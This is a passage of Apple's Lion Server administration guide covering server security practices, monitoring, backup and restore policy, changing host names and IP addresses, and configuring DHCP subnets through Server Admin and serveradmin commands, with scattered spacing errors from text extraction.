Configure ACLs as needed. Use ACLs to control who can access share points and their contents . Protect any account with root or system administrator privileges by following recommended pas sword practices using strong pas swords. Do not use adminis trator (UNIX admin group) accounts for daily use. Restrict the us e of adminis tration privileges by keeping the admin login and pass word separate from daily use. Back up critical data on the s ys tem regularly, with a copy s tored at a secure off-site location. Backup media is of little us e in recovery if it is destroyed with the computer during a fire. Test your backup and recovery contingency plans to ensure that recovery actually works . Review s ystem audit logs regularly and inves tigate unusual traffic. Dis able services that are not required on your system. A vulnerability that occurs in any service on your system can compromise the entire s ys tem. In s ome cases, the default configuration (out of the box) of a s ystem leads to exploitable vulnerabilities in s ervices that were enabled implicitly. Turning on a s ervice opens up a port that users can access your sys tem from. Although enabling Firewall service helps avoid unauthorized access, an inactive s ervice port remains a vulnerability that an attacker might exploit. Enable firewall service on servers, especially at the network frontier and DMZ. Your servers firewall is the firs t line of defense agains t unauthorized access. Cons ider also a third-party hardware firewall as an additional line of defens e if your server is highly prone to attack. If needed, install a local firewall on critical or sensitive servers. Implementing a local firewall protects the sys tem from an attack that might originate in the organizations network or from the Internet. For additional protection, implement a local Virtual Private Network (VPN) that provides a s ecure encrypted tunnel for communication between a client computer and your server application. Some network devices provide a combination of functions : firewall, intrusion detection, and VPN. Administer s ervers remotely. Manage your s ervers remotely using applications like Server app, Server Admin, Server Monitor, RAID Admin, and Apple Remote Des ktop. Minimizing phys ical access to the sys tems reduces the pos sibility of mischief. Use secure pas swords . Many applications and services require that you create passwords to authenticate. Mac OS X includes applications that help create complex passwords (using Password Assistant), and securely store your pas swords (using Keychain Acces s).
Serv er monitoring
Monitoring server availability

Detecting potential problems allows you to take steps to resolve them before they impact the availability of your servers. In addition, getting early warning when a problem occurs allows you to take corrective action quickly and minimize disruption to your services. About monitoring tools Track s erver alerts Monitor s erver stats Monitor s erver status overviews us ing Server Admin About Server Monitor About RAID Admin for s erver monitoring About Console for s erver monitoring Using disk monitoring tools Using network monitoring tools
Use server s tatus notification in Server Admin Other monitoring help topics Using remote kernel core dumps About Simple Network Management Protocol (SNMP) About Logging About notification and event monitoring daemons View running daemons Planning a monitoring policy Gathering data about your systems is a basic function of good administration. Different types of data-gathering are us ed for different purposes : His torical data collection His torical data is gathered for analysis. This could be used for IT planning, budgeting, and getting a baseline for normal server conditions and operations. What kinds of data do you need for thes e purpos es? How long does it need to be kept? How often does it need to be updated? How far in the pas t does it need to be collected? Real-time monitoring Real-time monitoring is for alerts and detecting problems as they happen. What are you monitoring? How often? Does that data tell you what you need to know? Are some of thes e real-time collections for historical purpos es? Debugging Recurring problems can be analyzed and fixed if properly tracked. Even if you dont control source code, good debugging logs and data can increase the ability of the developer to address your iss ues. How can you capture what is going wrong? How often? Does that data tell you what you need to know? Are they problems you can fix on your end, or do you need vendor support? Planning monitoring response The respons e to your monitoring is as important as the data collection. In the same way a backup policy is pointless without a restore s trategy, a monitoring policy makes little sense without a response policy. Several factors can be considered for a monitoring respons e: What are relevant response methods? In other words, how will the res ponse take place? What is the time to response? What is an acceptable interval between failure and res pons e? What are the s caling considerations ? Can the response plan work with all expected (and even unexpected) frequencies of failure? Are there tes ting monitoring systems in place? How do you know the monitoring policy is catching the data you need, and how do you know the res pons es are timely and appropriate? Have you tested the monitoring system recently?
Serv er monitoring
Monitor serv ers
Check server status

The Server app shows the overall status of each service.
In the Server s idebar, look for a green s tatus indicator next to each service icon. A service with a status indicator is turned on and operating normally. A s ervice without an indicator is turned off.
RELATED TOPIC
Start or s top a service
Serv er monitoring
Monitor serv ers
View server information

You can see general information about your server by using the Server app. The servers Overview pane displays the Mac model name, processor, serial number, storage capacity, memory s ize, startup dis k, s ys tem vers ion, and amount of time s ince the last system res tart.
1. In the Server app s idebar, s elect the server by name, and then click Overview. 2. To s ee more information about the s tartup disk and any other disks connected to the server, click the arrow next to the startup disk name. Youll see the Storage pane, which highlights the startup dis k in the list of available disks .
RELATED TOPIC
Serv er monitoring
Monitor serv ers
Monitor server stats

Use the Stats pane of the Server app to get a picture of s erver activity over time. You can find out when the s erver is likely to be bus y, whether its operating near capacity, and when its likely to be least us ed.
Choose a type of activity and a time period from the pop-up menus. Processor Usage: Monitor the workload of the servers processor or process ors. Memory Usage: See how much memory the s erver has been using. Network Traffic: Track how much incoming and outgoing data the server transfers over the network. You can also monitor server activity by using the Server Status widget on the server or on another computer. For information, see Use the Server Status widget. If the server has a display, you can use Activity Monitor (in the Utilities folder in Launchpad) on the server. Activity Monitor shows the proces ses and applications currently open on the computer. You can us e Activity Monitor to monitor short-term processor workload, disk activity, and network activity. For information, see Activity Monitor Help.
Serv er monitoring
Monitor serv ers
Track server alerts

You can us e the Server app to view mes sages about important events that have occurred on the server. Each alert mes sage notes when the event occurred, briefly describes the event, outlines available recovery options for resulting problems , and may assist you in recovery. Lion Server sends alerts about low disk space, software updates, expiring SSL certificates, email viruses, and network configuration changes. View alerts and resolve resulting problems 1. To view a list of alerts, s elect Alerts in the Server sidebar. Alerts you havent viewed are displayed in bold. 2. To view the description and recovery options for an alert, select the alert in the list, and then choose View Alert from the Action pop-up menu. You can also view an alert by double-clicking it in the list. 3. To recover from a problem as sociated with the alert, use the controls or follow the ins tructions under the Recovery Options heading. Clear all alerts
Select Alerts in the Server sidebar, and then choose Clear All from the Action pop-up menu.
Serv er monitoring
Monitor serv ers
Change the email address for server alerts

You can us e the Server app to change the email addresses Lion Server sends alerts to. Lion Server sends alerts about low disk space, software updates, expiring SSL certificates, email sus pected of having a virus , and network configuration changes.
1. Select Alerts in the Server sidebar. 2. Choose Configure Email Addresses from the Action pop-up menu. 3. Enter the email address you want alerts sent to, or enter multiple email address es separated by commas.
Serv er monitoring
Monitor serv ers
Use the Server Status widget

You can us e the Server Status widget to monitor the status of Lion Server, either on the s erver itself or from another computer with Mac OS X Lion.
1. Open Dashboard, and look for the Server Status widget. You can open Das hboard by clicking its icon in Launchpad or pressing its keyboard s hortcut, which is usually the F12 key. If you dont see the Server Status widget in Dashboard, click Dashboards Open button (+), and then click or drag the Server Status widget from the widget bar. You can us e multiple Server Status widgets to see more than one as pect of a servers status at once or to monitor other s ervers on the network. For more information, search Mac Help for Dashboard and widgets. 2. If you see the Server, Us er Name, and Pass word fields, enter the servers DNS name or IP address followed by an administrator name and password, and then click Done. 3. When the Server Status widget is connected to a server, it displays a graph and other status information about the server and its s ervices . You can: Monitor proces sor usage, network load, or disk usage by clicking an icon below the graph. Change the process or or network graphs time period to one hour, day, or week by clicking the graph. If your s erver has more than one disk, view the status of each disk in turn by clicking the dis k usage graph. Check the status indicator and activity statis tics for the listed s ervices . A green indicator means the service is running. Connect to a different server by moving the mouse to the upper-left corner of the widget and clicking the Info button (i).
RELATED TOPICS
Check server status Monitor s erver stats
Backing up the serv er
Backup policy
All storage sys tems can fail eventually. Either through equipment wear and tear, accident, or dis aster, your data and configuration settings are vulnerable to los s. You should have a backup plan in place to prevent or minimize your data loss. For an expanded introduction, see About backup and restore policies.
Backup strategies
There are many types of backup files, and within each type are many formats and methods . Each backup type serves a unique purpose and has its own considerations. These backup types are not mutually exclusive. They exemplify different approaches to copying data for backup purposes . For example, Time Machine us es a full file-level copy as a base backup; then it us es incremental backups to create snapshots of a computers data on a given day. Full images Full images are byte-level copies of data. They capture the state of the hard disk down to the most basic storage unit. These backups also keep copies of the dis k filesystem and the unused or eras ed portion of the dis k in question.They can be us ed for forensic study of the s ource disk medium. Such detail often makes file res toration unwieldy. Full Image backups are often compress ed and are only decompressed to res tore the entire file set. Full file-level copies Full file-level copies are backups that are kept as duplicates. They do not capture the finest detail of unus ed portions of the source disk, but they do provide a full record of the files as they exis ted at the time of backup. If a file changes , the next full file-level backup copies the entire data s et in addition to the file that changed. Incremental backups Incremental backups start with file-level copies , but they only copy files changed s ince the last backup. This saves s torage space and captures changes as they happen. Snapshots Snapshots are copies of data as it was in the past. You can make snapshots from collections of files, or more often from links to other files in a backup file s et. Snapshots are useful for making backups of volatile data (data that changes quickly), like databases in use or mail servers s ending and receiving mail.
Backup media
Several factors help you determine what type of backup media to choose. Cost Use cost per GB to determine what media to choose. For example, if your storage needs are limited, you can justify higher cost per GB, but if you need a large amount of storage, cost becomes a big factor in your decision. One of the most cost-effective storage s olutions is a hard disk RAID. It provides a low cost per GB, and it doesnt require the special handling needed by other cos t-effective s torage types , such as tape drives. Capacity If you back up only a s mall amount of data, low-capacity storage media can do the job. But to back up large amounts of data, use high-capacity devices, such as a RAID. Speed When your goal is to keep your s erver available mos t of the time, restoration s peed becomes a big factor in deciding which media to choose. Tape backup systems can be very cost effective, but they are much slower than RAID. Reliability Succes sful restoration is the goal of a good backup strategy. If you cant restore los t data, the effort and cost you spent in backing up data is wasted and the availability of your s ervices is compromis ed. Therefore, its important that you choose highly reliable media to prevent data loss. For example, tapes are more reliable than hard disks because they dont contain moving parts. Archive life You never know when youll need your backed up data. Therefore, choos e media that is designed to last for a long time. Dust, humidity, and other factors can damage s torage media and res ult in data loss.
Backup scheduling
Backing up files requires time and res ources . Before deciding on a backup plan, cons ider the following questions: How much data will be backed up?
How much time will the backup take? When does the backup need to happen? What else is the computer doing during that time? What sort of resource allocation is necessary? For example, how much network bandwidth is necess ary to accommodate the load? How much space on backup drives, or how many backup tapes are required? What sort of drain on computing resources will occur during backup? What personnel are necessary for the backup? Different kinds of backup require different answers to thes e ques tions. For example, an incremental file copy might take less time and copy les s data than a full file copy (because only a fraction of any given data s et will have changed since the las t backup). Therefore an incremental backup might be scheduled during a normal use period because the impact to users and s ystems may be very low. However, a full image backup might have a very s trong impact for users and sys tems, if done during the normal use period.
Command-line backup and restoration tools

Lion Server provides several command-line tools for data backup and restoration For more information about these commands, see their res pective man pages. rsync Use to keep a backup copy of your data in s ync with the original. The tool rsync only copies the files that have changed. By default rsync does not preserve extended attributes in files necessary for many Lion Server services. ditto Use to perform full backups. tar Use to perform full backups. asr Use to back up and restore a volume in block copy mode. If the tool is in file copy mode, it does not preserve all neces sary extended attributes in files. pg_dumpall and psql Use pg_dumpall to generate a text file of SQL commands that can recreate all databases as they were when the file was saved. Use psql to res tore the PostgreSQL databas es by executing the SQL commands in the text file output by pg_dumpall. WARNING: The pg_dumpall and psql tools perform a unified backup and restore of all services that use PostgresSQL databases . These tools back up and restore Addres s Book, iCal, Podcast, Profile Manager, and Wiki services together. If you use psql in order to restore the databas e for one of thes e services, it als o restores the databases for the other s ervices , and you lose changes made since backing up the databas es of all these s ervices . For information about backing up and restoring PostgreSQL databas es, see Chapter 24 of the PostgreSQL 9.0.4 Documentation at www.postgresql.org/docs/9.0/interactive/backup.html.
Backup verification
You s hould have a strategy for regularly conducting test restorations. Some third-party software providers s upport this functionality. However, if youre using your own backup s olution, develop the necessary tes t procedures .
Backup rotation scheme

A backup rotation scheme determines the mos t efficient way to back up data over a specific period of time. An example of a rotation scheme is the grandfather-father-s on rotation s cheme. In this scheme, you perform incremental daily backups (s on), and full weekly (father) and monthly (grandfather) backups. In the grandfather-father-son rotation scheme, the number of media sets you use for backup determines how much backup history you have. For example, if you use eight backup sets for daily backups, you have eight days of daily backup history because youll recycle media sets every eight days.
Other backup policy considerations

Cons ider the following additional items for your backup policy. Should file compress ion be us ed? If so, what kind? Are there onsite and offsite backups and archives? Are there s pecial needs for the type of data being stored? For example, for Mac OS X files, can the backup utility preserve file metadata, resource forks , and Access Control List (ACL) privileges ? Is there s ensitive data, such as passwords , social s ecurity numbers , phone numbers, medical records, or other legally protected information, that requires special treatment, and that must not be backed up without understanding where the data will flow and be stored?
Data restoration
No backup policy or solution is complete without having accompanying plans for data restoration. Depending on what is being restored, you may have different practices and procedures . For example, your organization may have specific tolerances for how long critical systems can be out of use while the data is restored. Cons ider the following questions: How long will it take to restore data at each level of granularity? For example, how long will a deleted file or email take to restore? How long will a full hard disk image take to restore? How long would it take to return the whole network to its s tate three days ago? What proces s is mos t effective for each type of restore? For example, why would you roll back the entire s erver for a single lost file? How much administrator action is necessary for each type of restore? How much automation must be developed to best use administrators time? Under what circumstances are restores initiated? Who and what can start a res tore and for what reasons? Restore practices and procedures must be tes ted regularly. A backup data set that does not res tore correctly cannot be considered a trus tworthy backup. Backup integrity is measured by restore fidelity.
Server backup and restore

You can back up s erver files automatically us ing Time Machine, a comprehensive backup solution. Time Machine automatically makes a complete backup of all files on the computer to a locally attached external hard drive, an available internal hard disk, or a remote network file system. It also keeps track as files are created, updated, or deleted over time. Time Machine backs up the changes and creates a history of the file s ystem that you can navigate by date. You can use its intuitive time-based vis ual browser to s earch back through time to find and restore any files that were backed up. You s et backup options in the Time Machine pane of System Preferences on the server. You can set up a list of folders and disks that you want to exclude from backup. Time Machine automatically excludes temporary files and cache files located in /tmp/, /Library/Logs /, /Library/Caches/, and /Users /username /Library/Caches/. Note: If the server is a portable computer, you may improve performance of a portable computer by turning off Time Machine local snapshots . For instructions, see Turn off Time Machine local snapshots . Time Machine automatically backs up data and s ettings for these s ervices : Address Book, File Sharing, iCal, iChat, Mail, Podcast, Profile Manager, Time Machine, VPN, Web, and Wiki. Time Machine also automatically backs up s ome settings for other services, but you may not be able to completely res tore s ettings changed with Server Admin or with command-line tools. After us ing Time Machine to back up your server, you can restore your server to a previous state. For information about backing up and restoring with Time Machine, s earch Mac Help for Back up your Mac.
Turn off Time Machine local snapshots
You may improve performance of a portable computer by turning off Time Machine local snapshots. If your server is a portable computer, Time Machine may use the internal dis k to s tore local s naps hots of files that have changed. Storing these local snapshots may degrade server performance. You can turn off saving of local s naps hots by using the tmutil command-line tool.
Open Terminal (located in Launchpad's Utility folder), and enter: $ sudo tmutil disablelocal
Netw ork identity
Understanding changes to the server IP address or network identity

When you change a s ervers IP address , hos t name, local hostname, or computer name, additional configuration steps might be needed for each s ervice provided. Each service relies on IP addres ses or names differently; therefore, the combination of steps relies on your individual s etup. Learn more about how network identy changes affects: Infras tructure services Collaboration services File s ervices Mail services Podcast services Web and wiki services Other s ervices
Netw ork identity
Understanding Lion Server names

Three names are used by Lion Server: computer name, local hos tname, and hos t name. They are us ed by different parts of the system for different reasons, and are not linked. Changing the computer name and the local hostname is not the same thing as changing the host name. The computer name is a user-friendly name for the system and is shown in the Finder and tools like Apple Remote Desktop. The local hostname is a domain name, usable only on the local network, and is publis hed to other services that are Bonjouraware. The host name is the Internet host name, which is a fully qualified domain name. Only the hos t name is the Internet-routable name that s ervices use for network identity.
Netw ork identity
Change the server's host name after setup

You can change the host name of a server after s etup, but it is not recommended. You can use the scutil command-line tool to set the hos t name. The host name is the Internet host name, which is a fully qualified domain name. Only the hos t name is the Internet-routable name that s ervices use for network identity. The Server app includes an as sistant for changing the s erver's host name. The assistant can also be us ed to change the server's network address. The assistant reconfigures s ervices to us e the new host name and any other changes to the network configuration. For information, see Find or change your servers host name. If you change a servers host name after setup, the name must be changed with your DNS service provider.
Until the servers host name matches the name with the DNS s ervice provider, several services will not function. Changing your hos t name can have significant unintended cons equences, depending on the s ervices your server provides. For information on the effects of changing the host name, see Understanding IP address or network identity changes on infras tructure services. Note: If you choose not to use Server App to change the hos t name, the changeip command-line tool is still available, but not recommended.
Use Server App to change the servers host name. See Find or change your servers host name If you choose not to us e Server App, use scutil to change the host name. sudo scutil --set (ComputerName|LocalHostName|HostName) <NewName.domain.tld>
Command example: sudo scutil --set HostName newhost.example.com
Netw ork identity
Change the servers computer name and the local hostname

You can us e the scutil command-line tool to set the computer name and local hostname. The computer name is a user-friendly name for the system and is shown in the Finder and tools like Apple Remote Desktop. The local hostname is a domain name, usable only on the local network, and is publis hed to other services which are Bonjouraware.
Use scutil to change the computer name and local hos tname. sudo scutil --set ComputerName <newComputertitle> sudo scutil --set LocalHostName <newLocalHosttitle>
Netw ork identity
Changing the IP address of a server

You can change the IP address of a server using the Network pane of System Preferences or the networksetup tool. Do not turn off the primary network interface and then turn it back on with a different addres s. Several services will not get the needed notification to update their configuration. Changing your IP address can have significant unintended consequences , depending on the services your server provides. For information on the effects of changing the IP addresses, s ee Unders tanding IP addres s or network identity changes on infras tructure services. The changeip command-line tool can accomplish manually what is done automatically, and it is still available. IP address changes and Server App The Server app detects and posts an alert about network configuration changes , including host name change and network address change. The alert contains a button that reconfigures services to use the new network configuration. It does this by running the changeip command-line tool. The automated resolution takes care of s ervices managed by the Server app. For information, see Find or change your servers IP address.
Netw ork infrastructure serv ices
DHCP
About DHCP service
If your organization has more clients than IP addresses, you can benefit from using Dynamic Host Configuration Protocol (DHCP) service. IP addres ses are as signed as needed, and when theyre not needed, they can be used by other clients. You can use a combination of static and dynamic IP addresses for your network. DHCP service lets you administer and distribute IP address es to computers from your server. When you configure the DHCP server, you assign a block of IP address es that can be made available to clients. Each time a computer configured to use DHCP s tarts up, it looks for a DHCP server on your network. If it finds a DHCP server, the client computer then requests an IP addres s. The DHCP server checks for an available IP addres s and s ends it to the computer with a lease period (the length of time the client computer can use the address) and configuration information. Organizations can benefit from the features of DHCP service, such as the ability to set Domain Name System (DNS) and Lightweight Directory Access Protocol (LDAP) options for computers without needing to configure each client. You can us e the DHCP module in Server Admin to: Configure and administer DHCP s ervice Create and adminis ter subnets Configure DNS, LDAP, and Windows Internet Naming Service (WINS) options for client computers View DHCP address leases Creating subnets Subnets are groupings of computers on a network that simplify administration. You can organize subnets any way that is useful to you. For example, you can create s ubnets for groups in your organization or for floors of a building. After you group computers into subnets, you can configure options for all computers on a s ubnet at one time ins tead of setting options for individual computers. Each subnet needs a way to connect to other subnets. A hardware device called a router typically connects subnets. Assigning IP addresses dynamically With dynamic address allocation, an IP address is assigned for a limited period of time (the lease time) or until the computer doesnt need the IP addres s, whichever comes first. By us ing short leases , DHCP can reass ign IP addresses on networks that have more computers than IP address es. Leases are renewed if the addres s is nt needed by another computer. Addresses allocated to VPN clients are distributed much like DHCP addresses , but they dont come out of the same range of addresses as DHCP. If you plan on using VPN, leave some address es unallocated by DHCP for us e by VPN. Using static IP addresses Static IP addresses are assigned to a computer or device once and then dont change. You can assign s tatic IP addres ses to computers that mus t have a continuous Internet presence, such as web servers. Other devices that must be continuously available to network users, such as printers , can also benefit from static IP address es. Static IP addresses can be s et up manually by entering the IP address on the computer (or other device) that is as signed the address, or by configuring DHCP to provide the s ame addres s to a s pecific computer or device on each request. Manually configured s tatic IP addres ses avoid potential issues that s ome services can have with DHCP-ass igned addresses, and they dont suffer from the delay that DHCP requires to as sign an address. DHCP-ass igned addresses permit address configuration changes at the DHCP server rather than at each client. Dont include manually ass igned static IP address ranges in the range distributed by DHCP. You can set up DHCP to always serve the s ame address to the s ame computer. For more information, see Use DHCP to assign static IP addresses. Locating the DHCP server When a computer looks for a DHCP server, it broadcasts a mess age. If your DHCP s erver is on a different subnet from the computer, make s ure the routers that connect your s ubnets can forward client broadcasts and DHCP s erver responses . A relay agent or router on your network that can relay BootP communications works for DHCP. If you dont have a means to relay BootP communications , place the DHCP server on the s ame subnet as your client. Interacting with other DHCP servers You might already have DHCP servers on your network, such as AirPort Bas e Stations.
Lion Server can coexist with other DHCP servers as long as each DHCP s erver uses a unique pool of IP addres ses . If AirPort Bas e Stations are on separate subnets, configure your routers to forward client broadcasts and DHCP server responses as described in Locating the DHCP server. Using multiple DHCP servers on a network You can have multiple DHCP s ervers on the same network. However, they must be configured properly to prevent interference with each other. Each server needs a unique pool of IP addres ses to distribute. Assigning reserved IP addresses Some IP addres ses cant be assigned, including address es reserved for loopback and broadcas ting. Your ISP wont assign these addresses to you. If you try to configure DHCP to use these addresses , youre warned that the address es are invalid and you must enter valid addres ses .
DHCP
Set up DHCP
DHCP setup overview

Here is an overview of the basic steps for setting up DHCP service. Note: If you used Gateway Setup Assistant to configure ports on your server when you installed Lion Server, some DHCP information is configured. Follow the s teps in this section to finish configuring DHCP service. Before you begin For is sues to keep in mind when you set up DHCP s ervice, read About DHCP s ervice. Enable DHCP service Before configuring DHCP s ervice, enable DHCP. See Enable DHCP service. Create subnets Use Server Admin to create a pool of IP addres ses that are shared by the client computers on your network. You create one range of s hared addresses per subnet. These address es are assigned by the DHCP server when a client issues a request. See Create DHCP subnets. Configure DHCP log settings You can log the activity and errors in DHCP service to help you identify use patterns and problems with your server. DHCP service records diagnostic mess ages in the system log file. To keep this file from growing too large, you can suppress most messages by changing log settings in the Logging pane of DHCP service s ettings. See Configure log settings for DHCP service. Start DHCP service After you configure DHCP, start the s ervice to make it available. See Start DHCP s ervice.
DHCP
Set up DHCP
Enable DHCP service

Before you can configure DHCP settings, you must Enable DHCP service in Server Admin.
1. Open Server Admin and connect to the s erver. 2. Click Settings. 3. Click Services. 4. Select the DHCP checkbox. 5. Click Save.
DHCP
Set up DHCP
Create DHCP subnets

Subnets are groupings of computers on the same network that can be organized by location (for example, floors of a building) or by usage (for example, eighth-grade students). Each subnet has at least one range of IP addresses assigned to it.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select DHCP. 4. Click Subnets. 5. Click the Add button (+). 6. Enter a des criptive name for the new s ubnet. 7. Enter a starting and ending IP address for this subnet range. Addresses must be contiguous and they cant overlap other subnet ranges. 8. Enter the subnet mask for the network addres s range. 9. From the pop-up menu, choose the network interface to hos t DHCP s ervice. 10. Enter the IP address of the router for this s ubnet. If the server youre configuring is the router for the s ubnet, enter this s ervers internal LAN IP address as the routers address. 11. Define a leas e time in hours, days, weeks , or months. 12. If you want to set DNS, LDAP, or WINS information for this subnet, enter thes e now. For more information, see Set the DNS server for a DHCP subnet, Set LDAP options for a s ubnet, and Set WINS options for a subnet. 13. Click Save. 14. To enable the subnet, select the Enable checkbox. 15. Click Save.
DHCP
Set up DHCP
Use serveradmin to create DHCP subnets

You can create a DHCP s ubnet us ing serveradmin. The subnetID parameter is a unique number that identifies the s ubnet. It can be any number not ass igned to another subnet on the server. Also, it can include embedded hyphens (-).
Parameter Description A unique number that identifies the subnet. Can be any number not assigned to another subnet on the server. Can include embedded hyphens (-). Other parameters T he standard subnet settings described in
subnetID
serveradmin man pages.
For information about setting DHCP subnet parameters, s ee serveradmin man pages. For information about serveradmin, see its man page.
To create a DHCP subnet: Note: Include the s pecial first setting (ending with = create). This is how you tell serveradmin to create the s ettings array with the s pecified subnet ID. $ sudo serveradmin settings
dhcp:subnets:_array_id:subnetID = create dhcp:subnets:_array_id:subnetID:descriptive_name = description dhcp:subnets:_array_id:subnetID:net_range_start = start-address dhcp:subnets:_array_id:subnetID:net_range_end = end-address dhcp:subnets:_array_id:subnetID:net_mask = mask dhcp:subnets:_array_id:subnetID:selected_port_name = port dhcp:subnets:_array_id:subnetID:dhcp_router = router dhcp:subnets:_array_id:subnetID:lease_time_secs = lease-time dhcp:subnets:_array_id:subnetID:dhcp_enabled = (yes|no) Control-D To view DHCP configurations s ettings: $ sudo serveradmin settings dhcp
DHCP
Set up DHCP
Configure log settings for DHCP service

You can choos e the level of detail for DHCP s ervice logs : Low (errors only): Indicates conditions where you mus t take immediate action (for example, if the DHCP server cant start up). This level corres ponds to bootpd reporting in quiet mode with the -q flag. Medium (errors and warnings): Alerts you to conditions where data is inconsistent but the DHCP server can still operate. This level corresponds to default bootpd reporting. High (all events): Records activity by DHCP service, including routine functions. This level corresponds to bootpd reporting in verbose mode with the -v flag.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select DHCP. 4. Click Settings. 5. From the Log Level pop-up menu, choose the logging option you want. 6. Click Save.
DHCP
Set up DHCP
Use serveradmin to configure log settings for DHCP service

The value can be ["LOW"|"MEDIUM"|"HIGH"].
To set up the log detail level: $ sudo serveradmin set dhcp:logging_level = value For information about serveradmin, see its man page.
DHCP
Set up DHCP
Start DHCP service
You s tart DHCP service to provide IP address es to users. You mus t have at least one subnet created and enabled.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select DHCP. 4. Click the Start DHCP button (below the Servers list). If the Firewall s ervice is running, a warning appears as king you to verify that all ports us ed by DHCP are open. Click OK. The s ervice runs until you s top it. It res tarts when your server is restarted.
DHCP
Set up DHCP
Use serveradmin to adjust log information collection for DHCP service

You s tart DHCP service to provide IP address es to users. You mus t have at least one subnet created and enabled.
To start DHCP service: $ sudo serveradmin start dhcp For information about serveradmin, see its man page.
DHCP
Manage DHCP
Stop DHCP service

When starting or s topping DHCP, you must have at leas t one subnet created and enabled.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select DHCP. 4. Click Stop Now.
DHCP
Manage DHCP
Use serveradmin to stop DHCP service

When stopping DHCP, you must have at leas t one subnet created and enabled.
To stop DHCP service: $ sudo serveradmin stop dhcp For information about serveradmin, see its man page.
DHCP
Manage DHCP
Change DHCP subnet settings

Use Server Admin to change DHCP subnet s ettings. You can change IP addres s range, subnet mask, network interface, router, or
lease time.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select DHCP. 4. Click Subnets. 5. Select a s ubnet. 6. Make your changes. Changes can include adding DNS, LDAP, or WINS information. You can also redefine address ranges or redirect the network interface that res ponds to DHCP reques ts . 7. Click Save. If DHCP is running, you are prompted to res tart DHCP for changes to take effect. Otherwise, changes take effect the next time you start DHCP.
DHCP
Manage DHCP
Use serverdmin to change DHCP subnet settings

To change a DHCP setting: $ sudo serveradmin settings dhcp:setting = value To change several DHCP settings: $ sudo serveradmin settings dhcp:setting = value dhcp:setting = value dhcp:setting = value [...] Control-D To view all DHCP settings : $ sudo serveradmin settings dhcp
Parameter Description A DHCP service setting. A relevant value for the setting.
setting value
For information about setting DHCP subnet parameters, s ee serveradmin man pages. For information about serveradmin, see its man page.
DHCP
Manage DHCP
Delete DHCP subnets

You can delete subnets and subnet IP address ranges so they are no longer distributed to computers.
1. Open Server Admin and connect to the s erver.
2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select DHCP. 4. Click Subnets. 5. Select a s ubnet. 6. Click the Delete button (). 7. Click Save. If DHCP is running, you are prompted to res tart DHCP for changes to take effect. Otherwise, changes take effect the next time you start DHCP.
DHCP
Manage DHCP
Disable subnets temporarily

You can temporarily s hut down a s ubnet without losing its s ettings. No IP addresses from the subnets range are distributed on the selected interface to any computer until you reenable the subnet.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select DHCP. 4. Click Subnets. 5. Des elect the Enable checkbox next to the subnet to dis able. 6. Click Save. If DHCP is running, you are prompted to res tart DHCP for changes to take effect. Otherwise, changes take effect the next time you start DHCP.
DHCP
Manage DHCP
Change IP address lease times for a subnet

You can change how long IP addres ses on a s ubnet are available to computers.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select DHCP. 4. Click Subnets. 5. Select a s ubnet. 6. From the Lease Time pop-up menu, choose a time s cale (hours, days, weeks , or months). 7. In the Lease Time field, enter a number. 8. Click Save. If DHCP is running, you are prompted to res tart DHCP for changes to take effect. Otherwise, changes take effect the next time you start DHCP.
DHCP
Manage DHCP
Set the DNS server for a DHCP subnet

You can determine the DNS servers and default domain name a subnet should use. DHCP service provides this information to computers in the subnet.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select DHCP. 4. Click Subnets. 5. Select a s ubnet. 6. Click DNS. 7. Enter the primary and secondary name server IP addresses you want DHCP clients to us e. 8. Enter the default domain of the subnet. If DHCP is running, you are prompted to res tart DHCP for changes to take effect. Otherwise, changes take effect the next time you start DHCP. 9. Click Save.
DHCP
Manage DHCP
Use serveradmin to set the DNS server for a DHCP subnet

Use the same subnetID us ed to create the subnet.
Parameter Description A unique number that identifies the subnet. Can be any number not assigned to another subnet on the server. Can include embedded hyphens (-).
subnetID
dns-server-n
T o specify additional DNS servers, add incrementing
dhcp_name_server settings,
_array_index:n for each additional value. serveradmin man pages.
Other parameters
T he standard subnet settings described in
To set DNS options for a subnet: $ sudo serveradmin settings dhcp:subnets:_array_id:subnetID:dhcp_domain_name_server:_array_index:0 = dns-server-1 dhcp:subnets:_array_id:subnetID:dhcp_domain_name_server:_array_index:1 = dns-server-2 dhcp:subnets:_array_id:subnetID:dhcp_domain_name = domain Control-D For information about serveradmin, see its man page.
DHCP
Manage DHCP
Set LDAP options for a subnet

You can us e DHCP to provide your clients with LDAP s erver information, but Mac OS X v10.5 or later clients won't automatically bind
to the LDAP server. The order in which the LDAP servers appear in the list determines their search order in the automatic Open Directory search policy. If you are using this Mac server as an LDAP master, LDAP options are populated with the neces sary configuration information. If your LDAP master s erver is another computer, you must know the domain name or IP address of the LDAP databas e to use, and you must know the LDAP search base.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select DHCP. 4. Click Subnets. 5. Select a s ubnet. 6. Click LDAP. 7. Enter the domain name or IP addres s of the LDAP server for this subnet. 8. Enter the search base for LDAP searches. 9. If youre using a nonstandard port, enter the LDAP port number. 10. If neces sary, select LDAP over SSL. Use this option to secure LDAP communication. 11. Click Save. If DHCP is running, you are prompted to res tart DHCP for changes to take effect. Otherwise, changes take effect the next time you start DHCP.
DHCP
Manage DHCP
Use serveradmin to set LDAP options for a subnet

Use the same subnetID you used to create the subnet.
subnetID
To set LDAP options for a subnet: $ sudo serveradmin settings dhcp:subnets:_array_id:subnetID:dhcp_ldap_url:_array_index:0 = ldap-server Control-D For information about serveradmin, see its man page.
DHCP
Manage DHCP
Set WINS options for a subnet

